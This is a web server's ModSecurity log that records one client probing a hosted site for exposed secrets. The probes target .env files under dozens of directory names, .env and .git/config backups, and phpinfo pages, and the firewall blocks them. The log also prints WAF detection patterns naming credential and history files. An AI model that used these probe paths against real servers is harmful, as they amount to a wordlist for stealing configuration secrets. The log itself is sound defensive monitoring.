[Tue May 26 13:17:24.232968 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.docker/.env"] [unique_id "ahVQDGkFNZ9cRlz80IjPzwAAAPw"]
[Tue May 26 13:17:24.272801 2026] [security2:error] [pid 501489:tid 501711] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.docker/laravel/app/.env"] [unique_id "ahVQDGkFNZ9cRlz80IjP2AAAAOA"]
[Tue May 26 13:17:24.359387 2026] [security2:error] [pid 501489:tid 501636] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahVQDGkFNZ9cRlz80IjP4AAAAJY"]
[Tue May 26 13:17:24.387998 2026] [security2:error] [pid 501489:tid 501746] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahVQDGkFNZ9cRlz80IjP5AAAAP8"]
[Tue May 26 13:17:24.416445 2026] [security2:error] [pid 501489:tid 501708] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahVQDGkFNZ9cRlz80IjP6AAAAN0"]
[Tue May 26 13:17:24.495009 2026] [security2:error] [pid 501489:tid 501750] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahVQDGkFNZ9cRlz80IjP8gAAAQM"]
[Tue May 26 13:17:24.512029 2026] [security2:error] [pid 501489:tid 501632] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVQDGkFNZ9cRlz80IjP8wAAAJI"]
[Tue May 26 13:17:24.572220 2026] [security2:error] [pid 501489:tid 501631] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env.swp"] [unique_id "ahVQDGkFNZ9cRlz80IjP-wAAAJE"]
[Tue May 26 13:17:25.260704 2026] [security2:error] [pid 501489:tid 501620] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env~"] [unique_id "ahVQDWkFNZ9cRlz80IjQFAAAAIY"]
[Tue May 26 13:17:25.809772 2026] [security2:error] [pid 501489:tid 501654] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQDWkFNZ9cRlz80IjQHAAAAKc"]
[Tue May 26 13:17:25.831406 2026] [security2:error] [pid 501489:tid 501694] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.git/config~"] [unique_id "ahVQDWkFNZ9cRlz80IjQNAAAAM8"]
[Tue May 26 13:17:25.895376 2026] [security2:error] [pid 501489:tid 501637] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.git/config.bak"] [unique_id "ahVQDWkFNZ9cRlz80IjQQAAAAJc"]
[Tue May 26 13:17:25.899139 2026] [security2:error] [pid 501489:tid 501706] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.git/config.old"] [unique_id "ahVQDWkFNZ9cRlz80IjQQgAAANs"]
[Tue May 26 13:17:26.475942 2026] [security2:error] [pid 501489:tid 501744] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/ADMIN/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQgAAAAP0"]
[Tue May 26 13:17:26.489519 2026] [security2:error] [pid 501489:tid 501742] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/API/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQgwAAAPs"]
[Tue May 26 13:17:26.582155 2026] [security2:error] [pid 501489:tid 501716] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/APP/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQhwAAAOU"]
[Tue May 26 13:17:26.594392 2026] [security2:error] [pid 501489:tid 501640] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/Api/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQiAAAAJo"]
[Tue May 26 13:17:26.614940 2026] [security2:error] [pid 501489:tid 501694] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/BACKEND/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQiQAAAM8"]
[Tue May 26 13:17:26.623426 2026] [security2:error] [pid 501489:tid 501737] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/BE/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQigAAAPY"]
[Tue May 26 13:17:26.631362 2026] [security2:error] [pid 501489:tid 501699] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/Backend/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQiwAAANQ"]
[Tue May 26 13:17:26.644687 2026] [security2:error] [pid 501489:tid 501697] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/Be/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQjQAAANI"]
[Tue May 26 13:17:26.761139 2026] [security2:error] [pid 501489:tid 501735] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/BACK/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQmwAAAPU"]
[Tue May 26 13:17:27.003277 2026] [security2:error] [pid 501489:tid 501651] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQtgAAAKQ"]
[Tue May 26 13:17:27.107471 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/admin-app/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQwgAAAPw"]
[Tue May 26 13:17:27.216161 2026] [security2:error] [pid 501489:tid 501660] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQywAAAK0"]
[Tue May 26 13:17:27.238820 2026] [security2:error] [pid 501489:tid 501749] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQzAAAAQI"]
[Tue May 26 13:17:27.264679 2026] [security2:error] [pid 501489:tid 501748] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/administrator/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQzQAAAQE"]
[Tue May 26 13:17:27.280611 2026] [security2:error] [pid 501489:tid 501630] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/api-backend/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQzwAAAJA"]
[Tue May 26 13:17:27.289157 2026] [security2:error] [pid 501489:tid 501715] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/api-node/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQ0QAAAOQ"]
[Tue May 26 13:17:27.324375 2026] [security2:error] [pid 501489:tid 501688] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQ1gAAAMk"]
[Tue May 26 13:17:27.483180 2026] [security2:error] [pid 501489:tid 501739] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/api/info.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQ4QAAAPg"]
[Tue May 26 13:17:27.562893 2026] [security2:error] [pid 501489:tid 501669] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/api/phpinfo.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQ6QAAALY"]
[Tue May 26 13:17:27.761508 2026] [security2:error] [pid 501489:tid 501673] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/apis/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQ_gAAALo"]
[Tue May 26 13:17:27.848652 2026] [security2:error] [pid 501489:tid 501620] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjRCAAAAIY"]
[Tue May 26 13:17:28.093476 2026] [security2:error] [pid 501489:tid 501750] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/application/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRJAAAAQM"]
[Tue May 26 13:17:28.103191 2026] [security2:error] [pid 501489:tid 501658] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/apps/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRJQAAAKs"]
[Tue May 26 13:17:28.308542 2026] [security2:error] [pid 501489:tid 501746] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQD2kFNZ9cRlz80IjRBwAAAP8"]
[Tue May 26 13:17:28.444755 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/back-api/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRQwAAAPw"]
[Tue May 26 13:17:28.476952 2026] [security2:error] [pid 501489:tid 501620] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/back/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRRAAAAIY"]
[Tue May 26 13:17:28.480260 2026] [security2:error] [pid 501489:tid 501685] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/back-end/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRRQAAAMY"]
[Tue May 26 13:17:28.500564 2026] [security2:error] [pid 501489:tid 501709] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRRwAAAN4"]
